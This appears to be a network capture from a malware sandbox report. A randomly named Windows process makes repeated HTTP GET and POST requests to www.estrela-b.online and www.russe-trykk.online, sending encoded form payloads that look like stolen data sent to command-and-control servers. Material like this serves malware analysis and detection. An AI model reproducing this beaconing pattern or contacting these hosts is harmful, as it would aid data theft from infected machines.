                                                                                                                                                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: R]o6}a}Fapd]7X{*(ZbCr$ewI=W?&f(iu"l8+gEQ2+[Xg;C3V`:ZNW.%pcQ[-}u4y:{*+[mkvh1Py"ZgMn%H^h zL W0!b3N,T{)q~GPVxN![|F_,JTynjUB~GMP-+hVZ[titm9lUE<mzR7VS-]P|9Tjd9Nur?l./n$nH)KXHfHzj2FllL4mfCHe#5IyB,NcH#-AC9O[-<wK$K?z5rt1Sp+Q#vUe5[iP5/.Tt|43V+e&NV<nT7D[>r;_6D`@XaJ$/s)@g:b7!@ *lpm^t2&,h@*,JT*1Y0Z-^gl:l+CKXY4gWk+O|k K.6?bI7myBa (;mK(eHV 2
                                                                                                                                                                                                                        Oct 23, 2024 18:54:28.584088087 CEST277INData Raw: d7 d9 9b d2 48 7b 93 8d 42 59 44 07 16 3c 29 4a 3b c0 fb e1 73 8b c6 60 9f 6d 5e 60 4f 9e 64 c3 64 76 c0 ce 9f 1c f9 7a 1c 5f 08 b9 29 4a 4f c4 7f 02 ce 06 8c 13 32 b9 d1 80 38 a6 8e 48 5b 5d fb c1 ed ff 07 ec cb 61 08 30 39 23 4c c1 17 f3 ae a7
                                                                                                                                                                                                                        Data Ascii: H{BYD<)J;s`m^`Oddvz_)JO28H[]a09#L!1mi)bnyz"{0/h"#'7?c@J+i)OLaF)56/H[%/sF[k1?s;#p4n


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        16192.168.11.2049808162.241.63.77805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.010822058 CEST538OUTGET /65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g= HTTP/1.1
                                                                                                                                                                                                                        Host: www.estrela-b.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:54:31.253310919 CEST571INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:31 GMT
                                                                                                                                                                                                                        Server: nginx/1.23.4
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                        X-Redirect-By: WordPress
                                                                                                                                                                                                                        Location: http://estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIsld3byg7BhPFUAfPirzvQjQ8endFGhd5eV2I8oMWmFKGMjxKhm0/w9bVWL9pUke2g=
                                                                                                                                                                                                                        X-Newfold-Cache-Level: 2
                                                                                                                                                                                                                        X-Endurance-Cache-Level: 2
                                                                                                                                                                                                                        X-nginx-cache: WordPress
                                                                                                                                                                                                                        X-Server-Cache: true
                                                                                                                                                                                                                        X-Proxy-Cache: MISS


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        17192.168.11.2049809185.134.245.113805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.588176012 CEST823OUTPOST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 44 4e 75 6d 78 55 62 69 2b 79 53 55 43 30 47 54 6c 71 65 41 67 58 64 49 4e 62 78 4a 67 72 35 78 37 68 78 79 6d 75 6f 4a 70 6f 63 65 32 2b 34 51 63 65 5a 70 50 43 4f 51 4c 78 6d 4f 6f 2b 47 69 49 4b 2f 75 57 36 6d 78 4e 65 42 78 57 50 48 6e 41 67 37 34 69 4e 6b 32 54 52 38 66 76 76 45 62 44 6c 6c 31 50 52 59 2f 31 34 51 56 44 2b 4a 6d 55 59 2b 4e 71 49 37 59 61 4a 38 49 41 68 79 70 39 56 71 77 73 73 76 73 53 69 42 62 55 77 72 7a 46 6b 44 59 43 62 61 74 68 4d 58 62 79 70 64 48 72 79 56 71 61 70 55 6f 58 4f 77 70 59 78 52 35 59 34 6b 45 46 33 56 5a 73 30 4e 6c 44 4d 51 6b 74 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUC0GTlqeAgXdINbxJgr5x7hxymuoJpoce2+4QceZpPCOQLxmOo+GiIK/uW6mxNeBxWPHnAg74iNk2TR8fvvEbDll1PRY/14QVD+JmUY+NqI7YaJ8IAhyp9VqwssvsSiBbUwrzFkDYCbathMXbypdHryVqapUoXOwpYxR5Y4kEF3VZs0NlDMQktg==
                                                                                                                                                                                                                        Oct 23, 2024 18:54:41.784852028 CEST716INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:41 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        18192.168.11.2049810185.134.245.113805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.328823090 CEST843OUTPOST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 44 4e 75 6d 78 55 62 69 2b 79 53 55 43 52 57 54 32 35 47 41 6e 33 64 4c 55 72 78 4a 75 37 35 31 37 68 39 79 6d 76 73 6a 70 36 6f 65 34 2f 49 51 66 66 5a 70 4d 43 4f 51 54 42 6d 42 31 4f 47 70 49 4b 69 52 57 37 61 78 4e 65 46 78 57 4b 6a 6e 41 58 6e 35 77 4e 6b 77 56 52 38 42 72 76 45 62 44 6c 6c 31 50 52 4e 71 31 34 6f 56 44 4f 35 6d 56 39 53 4f 6a 6f 37 62 5a 4a 38 49 58 52 79 31 39 56 71 53 73 76 72 4b 53 67 35 62 55 78 62 7a 41 6d 37 58 52 37 61 76 6c 4d 57 59 6b 71 6f 32 79 6a 74 65 4b 35 4d 68 65 74 49 47 55 48 63 6a 46 4b 51 67 47 6b 4a 72 6f 45 30 4e 42 4f 52 2f 77 69 65 46 43 50 69 41 32 42 30 68 31 55 67 6f 4e 78 46 73 57 63 6f 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUCRWT25GAn3dLUrxJu7517h9ymvsjp6oe4/IQffZpMCOQTBmB1OGpIKiRW7axNeFxWKjnAXn5wNkwVR8BrvEbDll1PRNq14oVDO5mV9SOjo7bZJ8IXRy19VqSsvrKSg5bUxbzAm7XR7avlMWYkqo2yjteK5MhetIGUHcjFKQgGkJroE0NBOR/wieFCPiA2B0h1UgoNxFsWco=
                                                                                                                                                                                                                        Oct 23, 2024 18:54:44.531461000 CEST716INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:44 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        19192.168.11.2049811185.134.245.113805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.054519892 CEST2578OUTPOST /13t3/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.russe-trykk.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.russe-trykk.online/13t3/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 44 4e 75 6d 78 55 62 69 2b 79 53 55 43 52 57 54 32 35 47 41 6e 33 64 4c 55 72 78 4a 75 37 35 31 37 68 39 79 6d 76 73 6a 70 36 51 65 34 4a 63 51 5a 49 4e 70 4e 43 4f 51 4e 78 6d 56 31 4f 47 4f 49 4b 71 64 57 37 58 4b 4e 59 5a 78 57 70 62 6e 49 43 54 35 71 64 6b 77 58 52 38 41 76 76 45 30 44 6d 4e 78 50 52 64 71 31 34 6f 56 44 4e 68 6d 63 49 2b 4f 76 49 37 59 61 4a 38 45 41 68 79 52 39 57 62 74 73 73 48 38 53 51 5a 62 55 52 4c 7a 43 7a 76 58 4c 37 61 70 67 4d 57 36 6b 71 30 74 79 67 5a 34 4b 35 4a 36 65 75 59 47 58 7a 64 73 43 71 73 52 55 6e 78 61 6c 46 67 4f 4f 34 5a 2b 79 69 75 4c 4a 4f 32 2f 36 33 51 68 36 45 59 63 49 51 4a 6b 4b 59 58 4b 4d 30 61 79 57 75 76 47 35 6c 38 67 4c 4f 43 73 6f 71 6e 43 4c 71 35 58 62 75 2b 4a 4e 6a 74 57 72 78 47 34 38 71 34 50 67 6d 4c 71 75 77 6c 79 56 7a 59 37 44 4b 7a 66 4c 6d 52 37 49 39 43 64 62 4d 70 47 67 2f 33 50 57 4e 54 79 6b 4c 73 63 49 44 6e 6d 6c 57 41 50 4d 6b 36 62 31 37 6d 65 7a 56 47 4a 7a 56 6f 77 67 52 59 62 43 7a 55 57 35 35 58 4e [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=DNumxUbi+ySUCRWT25GAn3dLUrxJu7517h9ymvsjp6Qe4JcQZINpNCOQNxmV1OGOIKqdW7XKNYZxWpbnICT5qdkwXR8AvvE0DmNxPRdq14oVDNhmcI+OvI7YaJ8EAhyR9WbtssH8SQZbURLzCzvXL7apgMW6kq0tygZ4K5J6euYGXzdsCqsRUnxalFgOO4Z+yiuLJO2/63Qh6EYcIQJkKYXKM0ayWuvG5l8gLOCsoqnCLq5Xbu+JNjtWrxG48q4PgmLquwlyVzY7DKzfLmR7I9CdbMpGg/3PWNTykLscIDnmlWAPMk6b17mezVGJzVowgRYbCzUW55XNjIu+QCh+vdKBsaAdFqBN/NCZcfyW2hMZRkbHwmasI1mNsWde1RZuZwPUaPWK5QWr8NXloe+b/Bb9f97FqwhGRPp0Dw5kVtmQEKWZL0MW61shAVUkAOkFlDQY0fhVzfw0ZvnRTpZT2hq6+/xJUHqb4QbhX7Is07XCcJxSpPpk9RwzyfLHqKUSNJtT6NP8/svaGqoUsJy2JC15b9y4kkZwHYqqZsH7sW7GKUA8gpcSlPGJ6fJPO+GeBDCjwPuktRV1vEv4OQkATusYDes1eUd1N5ilm5QfEWjJzlOturGhCa22e2uh8PSJYnRhBH+jXROFOv75cSpgVRbzFjLcqlEhd0Ej00JZA9oxAlDrH5L8BTuhsRdgkFQuKweG3vGw87vLqcFioRzQK7s0NrW5D5Nrrhjn43j7UfReoSYHLbEwdmfufRoIs6OZLSIR4BLTA+k7Az21/jW/TKuLfMhu1Fd+0PeRRq3oTb/2N1iCLBv/mdQ65KYSLOoH3RV+16nyvWULZIgkDMHvTrF6GBtpIvznKg7ZAcq1wFgvgdmAKOxcLF5Q9yaiPUPYlHDUG6BpFWAGi1KeKNryw7BvjutlKU98tKD7MJvS6oX+qXIaKgPNCY9wNmHihYOjaz7gf6G500ZvovmrW+cTFiJxwvSh4a4/OcFz76bvv/rWQw [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.054554939 CEST5156OUTData Raw: 71 77 6d 6b 75 4a 62 32 73 6f 54 52 6b 66 45 49 65 32 78 79 7a 35 47 33 58 70 69 42 30 45 48 70 4b 48 64 53 4f 57 46 2f 6c 57 59 57 57 43 34 6e 69 62 6a 2b 63 69 70 30 36 32 46 54 44 4d 6a 47 39 52 64 43 79 65 78 65 64 79 6c 4d 64 45 73 59 42 73
                                                                                                                                                                                                                        Data Ascii: qwmkuJb2soTRkfEIe2xyz5G3XpiB0EHpKHdSOWF/lWYWWC4nibj+cip062FTDMjG9RdCyexedylMdEsYBsklC16/p1Op+44vXJnwH1ubZu8ZYXqR1Qjg4xNZyJ8vGB8uEZUuaC4kDO63nnCLI8auiqWNeKp8MRJk6FK07IY4E0Nd8Uu3dsGGa0DYkFFWLQDCT9tnFmLbf0FidGs+LhiURalOOJSh3Wceq8uJcemdw51W86MGrkD
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.054627895 CEST258OUTData Raw: 48 35 61 6c 47 52 44 31 43 64 4c 79 2f 30 35 4a 44 47 4f 65 73 76 37 57 2f 50 46 34 71 56 76 77 4a 47 66 51 37 2b 57 72 61 31 57 65 2b 31 70 42 6c 37 2b 78 37 44 33 35 5a 4e 79 6c 39 62 38 51 38 61 4a 67 63 64 4a 6c 52 38 4b 4b 38 67 76 49 61 6a
                                                                                                                                                                                                                        Data Ascii: H5alGRD1CdLy/05JDGOesv7W/PF4qVvwJGfQ7+Wra1We+1pBl7+x7D35ZNyl9b8Q8aJgcdJlR8KK8gvIajcE+DzKLUcWIN6dZzCceTQDOw6rIrk2F6vS2fwFZv39umOo9SBvl9rUEfTVwgD02uvOPGMUynhLPy5papFw2ktg17RZpXLXdCm9UAYzsLN8IanEG6qoiBhR0igkKowKbBBdG0mEFGv5XzjbLVZ1H4HPGvl/HY8IJAl
                                                                                                                                                                                                                        Oct 23, 2024 18:54:47.245516062 CEST716INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:47 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        20192.168.11.2049812185.134.245.113805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.771640062 CEST540OUTGET /13t3/?2rul-=OPGGyibZykz1HQ+fwNDr+1YpMJUD6qxq+hpAjJgj1ZR94MAkLt42BGXqMjTev/m9FIbjW4eTPcRZap/xAhCWotsEASV9n/5Kf2dVcxkz55MgVuVRQ72L8tA=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.russe-trykk.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:54:49.965287924 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:49 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 17:54:49 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=3600
                                                                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                                                                        Data Raw: 31 35 34 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 75 6e 79 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 72 75 73 73 65 2d 74 72 79 6b 6b 2e 6f 6e 6c 69 6e 65 20 69 73 20 70 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 [TRUNCATED]
